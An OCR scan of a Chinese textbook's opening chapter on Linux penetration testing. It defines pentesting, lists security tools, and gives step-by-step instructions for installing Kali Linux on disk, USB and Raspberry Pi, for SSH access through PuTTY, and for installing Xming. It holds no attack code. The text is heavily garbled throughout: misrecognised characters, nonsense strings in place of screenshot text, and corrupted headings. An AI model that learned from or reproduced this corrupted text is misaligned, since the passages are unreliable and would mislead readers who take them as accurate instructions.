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第 1 章 “Linux 安全 渗透 简介 


渗透 测试 是 对 用 户 信息 安全 措施 积极 评估 的 过 程 。 通 过 系统 化 的 操作 和 分 析 ， 积 极 
发 现 系 统 和 网 络 中 存在 的 各 种 缺陷 和 弱点 ， 如 设计 缺陷 和 技术 缺陷 。 本 和 章 将 简要 介 
绍 Linux 安 全 渗透 及 安全 渗透 工具 的 相关 内 容 。 其 主要 知识 点 如 下 : 


什么 是 安全 渗透 ; 
安全 渗透 所 需 的 工具 ; 
Kali Linux 简 介 ; 

安装 Kali Linux ; 
Kali 更 新 与 升级 ; 
基本 设置 。 


1.1 什么 是 安全 渗 荐 


渗透 测试 并 没有 一 个 标准 的 定义 。 国 外 一 些 安 全 组 织 达 成 共识 的 通用 说 法 是 ， 渗 透 
测试 是 通过 模拟 恶意 黑客 的 攻击 方法 ， 来 评估 计算 机 网 络 系统 安全 的 一 种 评估 方 

法 ， 这 个 过 程 包括 对 系统 的 任何 弱点 、 技术 缺陷 或 漏洞 的 主动 分 析 。 这 个 分 析 是 从 
一 个 攻击 者 可 能 存在 的 位 置 来 进行 的 ， 并 且 从 这 个 位 置 有 条 件 主动 利用 安全 漏洞 。 


渗透 测试 与 其 他 评估 方法 不 同 。 通 部 的 评估 方法 是 根据 已 知 信息 资源 或 其 他 人 航 评 估 
xt RR, bo siet ee ee 去 发 
现 是 否 存在 相应 的 信息 资源 。 相 比较 而 言 ， 通 背 评 估 方 法 对 评估 结果 更 具有 全 面 
性 ， mu; 参透 测试 更 注重 安全 漏洞 的 严重 性 。 


渗透 测试 有 黑 盒 和 日 盒 两 种 测试 方法 。 黑 盒 测 试 是 指 在 对 基础 设施 不 知情 的 情况 下 
进行 测 试 。 白 盒 测试 是 指 在 完全 了 解 结构 的 情况 下 进行 测试 。 不 论 测 试 方法 是 否 相 
[E], 72383 IOS REUS X GUREA : 


e 渗透 测试 是 一 个 渐进 的 且 逐 步 深 入 的 过 程 。 
e 渗透 测试 是 选择 不 影响 业务 系统 正常 运行 的 攻击 方法 进行 的 测试 。 


1.2 安全 渗透 所 需 的 工具 


了 解 了 渗透 测 起 的 概念 后 ， 接 下 来 融 要 学 习 进 行 渗透 测试 所 使 用 的 各 种 工具 。 在 做 
渗透 测试 之 前 ， 需 要 先 了 解 渗 ATENTA 渗透 测试 所 需 的 工具 如 表 1-1 所 示 。 


表 1-1 ”渗透 所 需 的 工具 


splint unhide scrub 
pscan examiner ht 
flawfinder srm driftnet 
rats nwipe binwalk 
ddrescue firstaidkit-gui scalpel 
gparted xmount pdfcrack 
testdisk dc3dd wipe 
foremost afftools safecopy 
sectool-gui scanmem hfsutils 
unhide sleuthkit cmospwd 
examiner macchanger secuirty-menus 
srm ngrep nc6 

nwipe ntfs-3g mc 
firstaidkit-gui ntfsprogs screen 
net-snmp pcapdiff openvas-scanner 
hexedit netsed rkhunter 
Irssi dnstop labrea 
powertop sslstrip nebula 
mutt bonesi tripwire 
nano proxychains prelude-Iml 
vim-enhanced prewikka iftop 

wget prelude-manager scamper 
yum-utils picviz-gui iptraf-ng 
mcabber telnet iperf 


firstaidkit-plugin-all onenssh nethogs 


vnstat dnstracer upert 
aircrack-ng chkrootkit nload 
airsnort aide ntop 
kismet pads trafshow 
weplab cowpatty wavemon 


由 于 篇 幅 原 因 ， 这 里 只 列 了 一 部 分 工具 。 滩 透 测 试 所 需 的 工具 可 以 在 各 种 Linux 操 作 
系统 中 找到 ， 然 后 手动 安装 这 些 工 具 。 由 于 工具 繁 厅 ， 安 狱 这 些 工具 ， 会 变 成 一 个 
浩大 的 工程 。 为 了 方便 用 户 进 行 渗透 方面 的 工作 ， 有 人 将 所 有 的 工具 都 预 装 在 一 个 
Linux 系 统 。 其 中 ， 典 型 的 操作 系统 融 是 本 书 所 使 用 的 Kali Linux. 


该 系统 主要 用 于 渗透 测试 。 它 预 攻 了 许多 渗透 测 斌 软件， 包括 nmap 闯 口 扫 摘 器 、 
Wireshark (数据 包 分 析 器 ) . John the Ripper (密码 破解 ) 及 Aircrack-ng (一 套 
用 于 对 无 线 局 域 网 进行 渗 透 测 试 的 软件 ) 。 用 户 可 通过 硬盘 、Live CD 或 Live USB 
来 运行 Kali Linux。 


1.3 Kali Linux 简 介 


Kali Linux 的 前 身 是 BackTrack Linux 发 行 版 。Kali Linux 是 一 个 基于 Debian 的 Linux 
发 行 版， 包括 很 多 安全 和 取证 方面 的 相关 工具 。 它 由 Offensive Security Ltd 4 F0 
资助 ， 最 先 由 Offensive Security 的 MatiAharoni 和 Devon Kearns 通 过 重 写 Back 
Track 来 完成 。Back Track 是 基于 Ubuntu 的 一 个 Linux 发 行 版 。 


Kali Linux 有 32 位 和 64 位 的 镜像 ， 可 用 于 x86 指 合集 。 同 时 它 还 有 基于 ARM 架 构 的 镜 
像 ， 可 用 于 树 莓 派 和 三 星 的 ARM Chromebook。 用 户 可 通过 硬盘 、Live CD 或 Live 
USB 来 运行 Kali Linux 操 作 系 统 。 


1.4 ZR Kali Linux 


如 今 Linux 的 安 沪 过 程 已 经 非常 “傻瓜 ”化 ， 只 需要 轻 点 几 下 妃 标 ， 束 能 够 完成 整个 系 
RNR, Kali Linux 操 作 系 统 的 安 和 也 非常 简单 。 本 节 将 分 别 介绍 安 半 Kali Linux 
至 硬盘 、USB 驱 动 器 、 树 每 派 、VMware Workstation 和 Womuare Tods 的 详细 过 


程 。 
1.4.1 ZR E 


安装 到 硬 闽 是 最 基本 的 操作 之 一 。 该 工作 的 实现 可 以 让 用 户 不 使 用 DVD， 而 正常 的 
运行 Kali Linux。 在 安装 这 个 全 新 的 操作 系统 之 前 ， 需 要 做 一 些 准 各 工作 。 例 如 ， 从 
那里 得 到 Linux ? 对 电脑 配置 有 什么 要 求 ?...... 下 面料 未 一 列 出 这 些 要 求 。 


e Kali Linux 安 疼 的 磁盘 空间 的 最 小 值 是 8GB。 为 了 便于 使 用 ， 这 里 推荐 至 少 
25GB 去 保存 附加 程序 和 文件 。 

e 内 存 最 好 为 512MB 以 上 。 

e Kali Linux 的 下 载 地 址 http://www.kali.org/downloads/， 下 载 界面 如 图 1.1 所 示 。 


=) 


DOWNLOAD YOUR FLAVOUR OF KALI LINUX 





图 1.1 K#Kali Linux 界 面 


该 家 方 网 站 提供 了 32 位 和 64 位 ISO 文件 。 本 书 中 以 32 位 为 例 来 讲解 安生 和 使 用 。 下 
载 完 ISO 文件 后 ， 将 该 映像 文件 刻录 到 一 张 DVD 光 盘 上 。 接 下 来 融 可 以 着 手 将 
KaliLinuxzc3e ze fi & rh f, 


(1) 将 安装 光盘 DVD 插 人 到 用 户 计 算 机 的 光驱 中 ， 重 新 启动 系统 ， 将 看 到 如 图 1.2 
所 示 的 界面 。 


z 


CD LIU 


Boot menu 


Live (686-pae) 

Live (666-pae failsafe) 

Live (forensic mode) 

[Install 

Graphical install 

Install with speech synthesis 


Press ENTER to boot or TAB to edit a menu entry 





E 1.2 BaF 


(2) 该 界面 是 Kali 的 引导 界面 ， 在 该 界面 选择 安藤 方式 。 这 里 选择 Graphical 
Install 《图 形 界面 安 疼 ) ， 将 显示 如 图 1.3 所 示 的 界面 。 





Select a language 


Choose the language to be used for the installation process. The selected language will also be the 
default language for the installed system. 


Language: 


| 113a] 


‘Chinese (Traditional) - PAIRE) 


Croatian = Hrvatski 

Czech = Cestina 

Danish = Dansk 

Dutch k = Nederlands 

Dzongkha = Ém 

English = English 

Esperanto - Esperanto 

Estonian Eesti 

Finnish Suomi 

French Francais 

Galician Galego 

Georgian jJafhe aen 

German Deutsch 

Kran le Eh nia a be 
Screenshot Go Back Continue 


(3) 在 该 界面 选择 安 妆 系统 的 罗 〈 认 语言 为 Chinese (Simplified) ， 然 后 单 击 
Continue 按 钮 ， 将 显示 如 图 1.4 所 示 的 界面 。 





请 选择 您 的 区 域 : 


选择 的 区 域 悍 被 用 于 设置 党 的 时 区 以 及 其 它 例 如 帮助 决定 双流 区 域 。 通 常 这 应 该 为 您 所 属性 的 国家 。 


CER Thee SHAR. ORLA THR. wikis "IE, 
HIE. Bere : 


i T other 


FERE am || se 





1.4 选择 您 的 区 域 


(4) 在 该 界面 选择 区 域 为 “中 国 "， 然 后 单 击 “ 继 续 " 按 钮 ， 将 显示 如 图 1.5 所 示 的 界 
Ho 





DFR : 
HANTE I ^ 
波斯 尼 亚 语 "| 
BEES 
保加利亚 请 
保加利亚 (phonetic 和 布局} 
加 章 大 法 语 
I Ex -- 25m 
nd e iris 
Tei ——————————— 
LEN 
FER 
a 
siata (Dvorak) 
AFT 
世界 语 
Sibi Tis 


I£ 3 LIE IE E 


jaiz: LL 
[ 4 = 


1.5 WERA 


(5) RR MBAR A’, ABS HRS Re, BETA 1.6 B8 BJ 
IT Eo 








REA 
AE PLE. 


gi ttum Gem Te TUS, RIRTTEXIMCET IRSE. Wii NERO. ARTA. ae 
ZA. 








[E] 1.6 MEN: 


(6) 该 界面 用 来 设置 系统 的 主机 和 名， 这 里 使 用 默认 的 主机 名 Kali (用 户 也 可 以 输入 
自己 系统 的 名 字 ) 。 然 后 单 击 “ 继 续 "按钮 ， 将 显示 如 图 1.7 所 示 的 界面 。 





EB 
See TAR EA es. PEEVES. CAMEL .com. .net. .edu 或 .Org Sh. CIRCTIEGESSB— TARAA. (C 
HERS =t. ERRATA Bester. 


"Ha: 


kali.secureworks,.com 














E] 1.7 MEN 


(7) 该 界面 用 来 设置 计算 机 所 使 用 的 域名 ， 本 例 中 输入 的 域名 为 


kali.secureworks.com。 如 果 当 前 计算 机 没有 连接 到 网 络 的 话 ， 可 以 不 用 填写 域 
名 ， 赴 搂 单 击 " 继 续 ” 按 钮 ， 将 显示 如 图 1.8 所 示 的 界面 。 





HEADER 


TENUu"root"m^ MATERA) HE- ES. ER THES eR RAT root KMR TEASEATENAR. DLEE 
Whiti — ERRA root BS. ETEA- tRETAPHAANAANSA -RTEA REER., 


-t TAE ENHA. FESO AAAS. ARPT. 

BAP CRAPPER, DSTA. MUH^"E^semmustrdFsneammetneesumTiummi*sudo"nhmnnmrmsamme^tm. 
WIE TATARAMI NEAN. 

Root H^ ES : 


tettette 


TREINEN TALE. MAAMAMAN root Eii, 
BRE TMDA ee a ae: 


LET Ju Bm | ma 


41.8 设置 用 户 和 密码 


(8) 在 该 界面 设置 root 用 户 密码 ， 然 后 单 击 "继续" 按钮， 将 显示 如 图 1.9 所 示 的 界 
Ho 





Bank 


a TASTIER. ORT. Teo. ARN THEAT 
HER Bae. 


. Ate mH ete x REN 


DS cimmmauxemvHeu RAE. F—TTEISUITERERIE ea 
HE IE : 





Ao .mmersz-cEBLVM 
p--mime;rszkBtS WM 
Fh 


FERE 


图 1.9 fx & 43 [X 


(9) 该 界面 供用 户 选择 分 区 。 这 里 选择 “使 用 整个 磁盘 ?， 然 后 单 击 "继续 "按钮 ， 将 
显示 如 图 1.10 所 示 的 界面 。 





HHE 
TETARA SRS nA. FE SRR Eme. 


Wisi Re ese : 


SCSI3 (0,0,0) (sda) - 85.9 GB VMware, 





VMware Virtual 5 





Ba | Het 


HEAR ES] 


E 1.10 磁盘 分 区 
(10) 该 界面 用 来 选择 要 分 区 的 磁盘 。 该 系统 中 只 有 一 块 倍 盘 ， 所 以 这 里 使 用 黔 认 
MARAT, ABM He ee, CRX RAUE.11B9 0128 IBI. 





Rane 


已 选择 要 分 区 : 

scCsl3 (0,0,0) (sda) - VMware, VMware Virtual 5: 85.9 GB 
THRO LEASH TANS aT. DLA. 请 选择 第 一 方案 。 
HETE.: 
GAELRGA— HEP (推荐 新 手 使 用 





f$ /home XTA HNE 
将 /home, /usr. ar X] /tmp 8273595 Cr F RET TEE 


BEARES 


EJ 1.11 已 选择 安 分 区 

(11) 该 界面 要 求 选择 分 区 方案 ， 默 认 提 供 了 三 种 方案 。 这 里 选择 “将 所 有 文件 放 在 
同一 个 分 区 中 (推荐 新 手 使 用 )“， 然 后 单 击 “ 继 续 " 按 钮 ， 将 显示 如 图 1.12 所 示 的 界 
E. 





Bank 


IBCHECEBITE KIHTCSIITEE B, AAF- HERNE (LAR, ARGH, IGI HEIN DUBIEREHGE X 
stie fg — Tim NE X SCRI 


A E k 
E RAID O8 
he riteeere 
Kauge 
= 5$C5/3 (0,0,0) (sda) - 85.9 GB VMware, VMware Virtual 5 
> Fl uz 82.4 GB f ext4 f k 
> #5 PHAR 3.568 f swap swap 


aM HESSE" 





FEEN 帮助 20 | eee 


图 1.12 fit & 4 [X 


(12) 在 该 界 选择 “分 区 设 定 结束 并 将 修改 写 入 磁盘"， 然 后 单 击 “ 继 续 " 按 钮 ， 将 旺 
示 如 图 1.13 所 示 的 界面 。 如 果 想 要 修改 分 区 ， 可 以 在 该 界面 选择 “撤消 对 分 区 设置 的 
修改 "”， 重 新 分 区 。 





磁盘 分 区 


如 果 剑 兰 污 ， 以 下 所 列 出 的 修改 内 容 查 被 与 入 亿 蔓 。 理 则 剑 焊 可 以 进行 进一步 的 手动 修 踊 。 


BUFiX 8 B 13D RAR : 
$C513 (0,0,0) (sda) 


以 下 分 区 将 被 格式 化 : 
SCSI3 (0,0,0) (sda) ha LMS 1 HERBY ext4 
$C513 (0, 0, 0) (sda) 设备 上 的 第 5 分 区 将 该 设置 为 swap 


Tray FA wa ? 


屏幕 截图 | SUR | 


E 1.13 W € [X 


(13) 在 该 界面 选择 "是 " 复 选 框 ， 然 后 单 击 " 继 续 " 按 钮 ， 将 显示 如 图 1.14 所 示 的 界 
To 





RRR 


a FERRET... 
ERREN SYP aT ae... 


图 1.14 安装 系统 


(14) 现在 丈 开 始 安 季 系统 了 。 在 安 闭 过 程 中 需要 设置 一 些 信 息 ， 如 设置 网 络 镜 
像 ， 如 图 1.15 所 示 。 如 果 安 疾 Kali Linux 系 统 的 计算 机 没有 连接 到 网 络 的 话 ， 在 该 界 
面 选择 “人 否 " 复 选 枉 ， 然 后 单 击 “继续 ”按钮 。 这 里 选择 “是 ” 复 选 枉 ， 将 显示 如 图 1.16 所 
示 的 界面 。 





配置 软件 包 管理 器 





网 络 镜像 可 以 用 来 补充 光盘 所 带 的 软件 ， 也 可 以 用 来 提供 较 新 版 本 的 软件 
(BAR SS EE en ? 

OS 

em 


1.15 Ace Ae EHA 








配置 软件 包 管理 器 





ORTARA HTTP AEREN. AEE AANEEN., AU. AEF., 
代理 信息 应 按照 ”http:W[[ 用 户 名 下 密码 ]@] 主 机 名 [: 端 口 1* 的 标准 格式 培 出 。 
HTTP 代理 信息 (MRLAAED : 





E 














RERE 返回 || #s | 


1.16 BHT TPE 


(15) 在 该 界面 设置 HTTP 代 理 的 信息 。 如 果 不 需 要 通过 HTTP 代 理 来 连接 到 外 部 网 
络 的 话 ， 直 接 单 击 “ 继 续 ? 按 钮 ， 将 旺 示 如 图 1.17 所 示 的 界面 。 
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正在 配置 apt 
IEEE HIR IG P m... 


WA 


1.17 扫 摘 镜像 站 点 


(16) 扫 朱 镜像 站 氮 完成 后 ， 将 显示 如 图 1.18 所 示 的 界面 。 





EBVWHREWER 


icit ea rpRTEITETP-uUIB. Tee. ETE CHE. NOB—ISBUMmSSE 
Debian SSR : 


Ert 3e DO 
A= 
AFH) 

LEER B 
Bj 

Enm 

EDI E PNE 
= 

ia) 

hl 


Lu———— — 
TREE E | mt —— 
1.18 镜像 所 在 的 国家 


(17) 在 该 界面 选择 镜像 所 在 的 国 冢 ， 这 里 选择 “中 国 ”， 然 后 单 击 " 继 续 "按钮 ， 
显示 如 图 1.19 所 示 的 界面 。 





Raters 


k 
RiSt Deblan JARE ARTEA ATi REST TANNER. FER T TARE SEM. 


AH. ftp. < TAATA. debian. org #9% 71 3177831& RATA. coSIESIB Con NE SH SD, OS TEA TRS 
m. MERER. 


Debian Gee: 


mirrors. 164. com 





Hp. cm. debian. org 
debian.ustc.edu.cn 
cdn. debian, met 
www. anheng. com. cn 
debian. bjtu.edu.cn 
mirrors.sohu.com 


daha Em || ma 


1.19 选择 镜像 


(18) 该 界面 默认 提供 了 7 个 镜像 站 点 ， 这 里 选 
里 选择 mirrors.163.com， 


择 一 个 作为 本 系统 的 镜像 站 点 。 这 
然后 单 击 “继续 "按钮 ， pA .20 所 示 的 界面 。 





GRUB RRR 


e ERSTAT Rees. DSA. CTESIESBLIESIBEI GRUB EzS5|/BERNER—U SEIS 
(MBR) 上 。 
RS AE th In rmmmeo REC. ERES PCR ERA. Ee. Faia 
l 
8 GRUB EBz55 ipa EX (MBAR) Ee? 
= 
* 8 


| 
MHRI 


1.20 RÉGRUB É 45| $ as EC 


(19) 在 该 界面 选择 是" 复 选 框 ， 然 后 单 击 “ 继 续 "按钮 ， 将 显示 如 图 1.21 所 示 的 界 
面 。 


到 主 引 导 记 录 (MBR) £4 





GRUB JEFTE 





= GRUB 


EEZ “update-grub"... 


1.21 GRUB RE $ 


(20) 此 时 将 继续 进行 安 疼 ， 结 束 安 委 进 程 后 ， 将 显示 如 图 1.22 所 示 的 界面 。 





nw EG 


TN ERRE 
[] / TS RE Ed ATOR T. AST STAC. VE). CoP eR 
hee. 


"med ie iE] 


1.22 结束 安装 进程 


(21) 在 该 界面 单 击 “继续 "按钮 ， 将 返回 到 安装 系统 过 程 。 安 装 完成 后 ， 将 会 自动 
重新 启动 系统 。 


1.4.2 LRFUSBIE A ae 


Kali Linux USB 了 驱动 器 提供 了 一 种 能 力 ， 它 能 永久 的 保存 系统 设置 、 永 久 更 新 及 在 
USB 设 备 上 安治 软件 包 ， 并 且 人 允许 用 户 运 行 目 己 个 性 化 的 Kali Linux, 4Win32h& & 
成 像 仪 上 创建 Linux 发 行 版 的 一 个 可 引导 Live USB 了 驱动 器 ， 它 包括 Kali Linux 的 持续 
存储 。 本 小 节 将 介绍 安装 Kali Linux 至 USB 驱 动 器 的 操作 步骤 。 


安装 一 个 操作 系统 到 USB 了 驱动 器 上 和 安装 至 人 硬盘 有 点 不 同 。 所 以 ， 在 安装 之 前 需要 
做 一 些 准 各 工作 。 例 如 ， 从 哪 得 到 Linux ? USB 了 驱动 器 的 格式 ?USB 驱动 器 的 大 
小 ?...... 下 面 籽 逐一 列 出 这 些 要 求 。 


一 个 FAT32 格 式 的 USB 了 驱动器 ， 并 且 最 小 有 8GB 的 空间 。 
一 个 Kali Linux ISO 映 像 。 

Win32 人 磁盘 成 像 仪 (映像 写 入 U 瘟 ) 。 

下 载 Kali Linux 从 http://www.kali.org/downloads/。 


前 面 的 准 各 工作 完成 之 后 ， 束 可 以 来 安装 系统 了 。 安 装 Kali Linux 到 一 个 USB 了 驱动 器 
上 的 操作 步骤 如 下 所 示 。 


(1) 插入 到 Windows 系 统一 个 被 格式 化 并 且 可 写 入 的 USB 了 驱动 器 。 插 入 后 ， 显 示 
界面 如 图 1.23 所 示 。 


“有 可 移动 存储 的 设备 (4) 





E, BD-ROM 驱动 器 (F; GT DVD RW 驱动 器 (GJ) 
E SS 
A KINGSTON (J:) 
* , CD 驱动 器 (H:) p 
= Pd "s 28.9 GB 可 用 , 共 29.0 GB 


图 1.23 可 移动 设备 


(2) 启动 Win32 Disk Imager, 和 启动 界面 如 图 1.24 所 示 。 在 Image File 位 置 ， 单 击 





一 一 | 图 标 选 择 Kali Linux DVD ISO 映像 所 在 的 位 置 ， 选 择 将 要 安装 Kali Linux 的 
USB 设 备 ， 本 例 中 的 设 各 为 K。 选 择 ISO 了 映像 文件 和 USB 设 各 后 ， 单 击 Write 按 钮 ， 
将 ISO 文件 写 信 到 USB 驱 动 器 上 。 





*$ Win32 Disk Imager 
| Image File Device | 


I:/ISOIR V PF/Kali/kali-linux-1. 0, 671386. iso SCA 





| [Copy | |Z| MDS Hash 


Progress 


Done. 





1.24 Win32 Disk Imager 初 始 界面 


(3) (€@AUNetbootin T B13 4- Kf px, — "USB 2478. 2UNetbootinL=, "Rf 
显示 如 图 1.25 所 示 的 界面 。 


对 UNetbootin 一 
ATH 0) == 选择 发 行 版 == -| == 选择 版 本 == - 


欢迎 使 用 Wetbeotin， 通用 网 络 引导 安装 程序 。 用 法 : 


- “在 选择 一 个 类 型 篇 本 下 载 ， 和 EK 
age ARD Rma or HER. 


r 
| 
| 
| 





à Sia D [ISO — | RXrfEMWaliVkali-limux-1.0.6-1388. ise | | 
Space used to preserve files across reboots (Ubuntu only): 4096 E ME 












































Sam): [USB 驱动 器 + | SBebe OD: (c^ -) (ae...) [取消 























1.25 选择 光盘 镜像 
(4) 在 该 界面 选择 "光盘 镜像 " 复 选 框 ， 然 后 选择 ISO 文件 所 在 的 位 置 ， 并 将 Space 


used to preserve files across rebootsiz & 7; 4096MB. 


(5) 选择 USB 驱 动 器 ， 本 例 中 的 USB 驱 动 器 为 K， 然 后 单 击 “人 确定? 按钮， 将 开始 创 
建 可 引导 的 USB 了 驱动 器 。 


(6) 创建 完成 后 ， 将 显示 如 图 1.26 所 示 的 界面 。 





g? UNetbootin 


1. REM RA) 

2. (RASA GIRO 

3， 安 装 Bootloader (GERE) 

4. 安装 元 成 ， 重启 (处 理 中 ) 












































重启 后 ， 在 BIOS 启动 菜单 里 选择 ws 启动 造 项。 
MIER? 


现在 重启 “| | 。 退出 





























1.26 UNetbootin 安 装 完成 


(7) 此 时 ，USB 了 驱动 器 束 创 建成 功 了 。 在 该 界面 单 击 “ 现 在 重启 "按钮 ， 进 入 BIOS 
启动 菜单 里 选择 USB 启 动 ， 就 可 以 安 疾 Kali Linux 操 作 系 统 了 。 


1.4.3 ZR Ze pu sf 


Bie (RAHA “Raspberry Pi’, fj E XRPi) 是 一 款 基 于 ARM 的 微型 电脑 主板 ， 
以 SD 卡 为 内 存 硬 盘 。 为 了 方便 携带 ， 在 树 每 派 上 安 委 Kali Linux 是 一 个 不 错 的 选 
择 。 本 小 节 将 介绍 在 树 每 派 上 安装 Kali Linux 操 作 系 统 。 


(1) Mhttp://www.offensive-security.com/kali-linux-vmware-arm-image-download/ 


网 站 下 载 树 每 派 的 映像 文件 ， 其 文件 名 为 kali-linux-1.0.6a-rpi.img.xz。 


(2) 下 载 的 映像 文件 是 一 个 压缩 也， 需要 使 用 7-Zip 压 缩 软 件 解压 。 解 压 后 其 名 称 
A kali-linux-1.0.6a-rpi.img. 


(3) 使 用 Win32 Disk Imager 工 具 ， 将 解压 后 的 映像 文件 导 人 到 树 每 派 的 SD 卡 中 。 
启动 Win32 Disk Imager 工 具 ， 料 显示 如 图 1.27 所 示 的 界面 。 
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‘Sp Win32 Disk Imager 


Image File 





| (Copy | 回 MDS Hash: 


| Progress 
IL 








Version: 0.9 















F:/ISOIRIR SZ PE/Kal i /kali -Linux-1. 0. 6a-rpi. ing 


MDS Hash: 


Progress 


Version: 0.9 


1.28 添加 映像 文件 
(5) 此 时 在 该 界面 单 击 Write 按 钮 ， 将 显示 如 图 1.29 所 示 的 界面 。 


1.4 安装 Kali Linux 
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Writing to a physical device can corrupt the device. 
(Target Device: [GA] "") 


Are you sure you want to continue? 





1.29 确认 写 和 人 数据 的 磁盘 

(6) 该 界面 提示 是 否 确定 要 将 输入 写 和 人 到 G 设 备 吗 ? 这 里 选择 Yes， 将 显示 如 图 
1.30 所 示 的 界面 。 

| Win32 Disk Imager 

EEN 2 

|7:/ISOMMR fb, Kali/kali-linux-1.0.6«-rpi.ime (el I: 


Copy | [7] wps Hash: 


Progress 















































Version: 0.9 Cancel | Read | | Trite 
24.777MB/s 








1.30 开始 写 入 数据 
(7) 从 该 界面 可 以 看 到 正在 写 入 数据 。 写 入 完成 后 ， 将 显示 如 图 1.31 所 示 的 界 
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1.31 完成 于 入 数据 


(8) 从 该 界面 可 以 看 到 守 人 数据 成 功 。 此 时 单 击 OK 按钮 ， 将 返回 到 图 1.28 所 示 的 
界面 。 然 后 单 击 Exit 按 钮 ， 天 闭 Win32 Disk Imager 工 具 。 


(9) 此 时 从 Windows 系 统 中 漳 出 SD 卡 ， 并 且 将 其 插 人 到 树 每 派 中 。 然 后 连接 到 显 
示 器 ， 插 上 了 网线、 鼠标 、 键 瘟 和 电源 ， 几 秒 后 将 启动 Kali Linux 操 作 系 统 。 使 用 Kali 
默认 的 用 户 名 和 密码 登录 ， 其 默认 用 户 名 和 密码 为 root 和 toor。 


如 果 用 户 觉 得 使 用 树 每 派 上 的 Kali 来 回 择 一 些 设备 比较 麻烦 时 ， 这 里 可 以 使 用 
PuTTY 攻 击 远 程 登录 到 Kali 的 命令 行 。 由 于 在 Linux 中 SSH 服 务 默认 是 启动 的 ， 所 以 
用 户 可 以 在 PuTTY 中 使 用 SSH 服 务 的 22 端 口 远程 连接 到 Kali Linux。 PuTTY 不 仅仅 
只 能 远程 连接 到 树 答 派 上 的 Kali 操 作 系 统 ， 它 可 以 连接 到 安装 在 任何 设 各 上 的 Kali 操 
作 系 统 。 下 面 将 介绍 使 用 PuTTY 工 具 ， 远 程 连接 到 Kali Linux 操 作 系 统 。 


(1) 下 载 PuTTY 的 Windows 版 本 。 
(2) 和 启动 PuTTY 工 具 ， 将 显示 如 图 1.32 所 示 的 界面 。 


S PuTTY JUNGE | i — 





















































Basic options for your PuTTY session 


specify the destination you want to connect to 
Host Name (or IP address) 





| 192168.6.101 























Features Connection type 
do | 
Behav Load, save or delete a stored session 

aviour | 
Translation Saved Sessions 
Selection 


Colours Defaut Settin gs | | Tum 


























1.32 PuTTY LE 


(3) 在 该 界面 ，Host Name (or IP address) 对 应 的 文本 框 中 输入 Kali 系 统 的 IP 地 
址 ， 并 且 Connection type 选 择 SSH。 然 后 单 击 ODpen 按 钮 ， 将 显示 如 图 1.33 所 示 的 
界面 。 如 果 不 知 道 Kali 系 统 IP 的 话 ， 执 行 ifconfig 命 令 查 看 。 
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1.33 和 警告 信息 


(4) 该 界面 显示 了 一 个 警告 信息 ， 这 是 为 了 安全 确认 是 否 要 连 援 到 该 服务 器 。 该 
对 话 框 只 有 在 第 一 次 连接 有 某 台 主机 时 才 会 弹出 。 这 里 单 击 “是 ”按钮 ， 将 显示 如 图 
1.34 所 示 的 界面 。 























dP 192.168.6.101 - PuTTY 

login as: root 
root@192.168.6.101's password: 
Linux kali 3.13.0 #1 PREEMPT Sun Jan 26 03:02:20 UTC 2014 armvél 


fhe programs included with the Kali GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 

TY, to the extent 


8 07: 51: 02 2014 


root@kali:~# a 





1.34 登录 到 Kali 系 统 


(5) 在 该 界面 输入 Kali 系 统 默认 的 用 户 合 和 窗 码 登录 到 系统 。 现 在 融 可 以 在 该 系统 
下 ， 运 行 任何 的 全 分 了 。 


如 果 用 户 不 喜欢 在 命令 行 下 操作 的 话 ， 也 可 以 远程 连接 到 Kali Linux 的 图 形 界面 。 下 
面 将 介绍 通过 安装 Xming 软 件 ， 实 现在 PuTTY 下 连接 到 Kali 操 作 系统 的 图 形 界面 。 


(1) 从 http://sourceforge.net/projects/xming/ 网 站 下 载 Xming 软 件 。 
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(2) 启动 下 载 的 Xming 软 件 ， 将 显示 如 图 1.35 所 示 的 界面 。 














1.35 欢迎 界面 


(3) 该 界面 显示 了 Xming 的 欢迎 信息 。 此 时 单 击 Next 按 钮 ， 将 显示 如 图 1.36 所 示 的 
界面 。 
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At least 4.7 MB of free disk space is required. 


41.36 选择 安 委 位 置 


(4) 在 该 界面 选择 Xming 的 安装 位 置 。 这 里 使 用 默认 的 位 置 
显示 如 图 1.37 所 示 的 界面 。 


nents you want to install: clear the components you do not want to 


install VPE Wai tad ead ee ono 


1.4 安装 Kali Linux 


To continue, click Next. F you would like to select a different folder, click Browse. 








， 单 击 Next 按 钮 ， 将 


29 





1.37 选择 组 件 


(5) 在 该 界面 选择 安 六 的 组 件 。 这 里 选择 Don't install an SSH client 组 件 ， 然 后 单 
击 Next 按 钮 ， 闻 显示 如 图 1.38 所 示 的 界面 。 


À Setup wil create the program's shortcuts in the following Start Menu folder. 


To continue, click Nest. F you would like to select a different folder, click Browse. 





| | Dont create a Start Menu folder 



































图 1.38 选择 启动 菜单 文件 夹 


(6) 在 该 界面 选择 启动 菜单 文件 来 。 这 里 默认 是 Xming， 如 果 想 使 用 不 同 的 文件 
夹 ， 单 击 Browse 按 钮 选择 新 的 文件 来。 如 果 使 用 默认 的 ， 则 单 击 Next 按 纽 ， 闻 显示 
如 图 1.39 所 示 的 界面 。 


| 一 | 一 y a a 
/ | a AS 1K 31i Tale a4 
| Éma AL -KAN Aa | U A 
LXI NCA LI WAN 
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Select the additional tasks you would like Setup to perform while installing Xming, then 





W] Create a desktop icon for Xming 
| | Create a desktop icon for XLaunch 
| |] Create a Quick Launch icon for Xming 
F] Create a Quick Launch icon for XLaunch 
[V] Associate XLaunch exe with the xlaunch file extension 





























1.39 选择 额外 的 任务 


(7) 在 该 界面 选择 Xming 创 建 的 快捷 方式 。 这 里 选择 Create a desktop icon for 
Xming (在 果 面 上 创建 快捷 方式 ) 复 选 框 ， 然 后 单 击 Next 按 钮 ， 将 显示 如 图 1.40 所 
示 的 界面 。 


| - i F 9 
N = "L >- Xm ^c 
， — pa m 
| 


Setup is now ready to begin instaling Xming on your computer. 





Click Install to continue with the installation, or chick Back f you want to review or 
change any settings. 


C:\Program Files (86)\4ming 


Xming binary 
Non US Keyboard support 
XLaunch wizard 7 ma ior iius 


Run utility - start programs with hidden console window 
Dont install an SSH cent 








1.4 ZzzxKali Linux 31 


1.40 准 各 安 狼 Xming 


(8) 通过 前 面 的 步骤 将 Xming 进 行 了 配置 。 现 在 准备 安装 ， 单 击 Install 按 纽 ， 将 显 
示 如 图 1.41 所 示 的 界面 。 


Completing the Xming Setup 
Wizard 


Setup has finished installing Xming on —— an 
appbcation may be launched by selecting the installed icons. 


[7] Launch Xming 








图 1.41 安装 完 


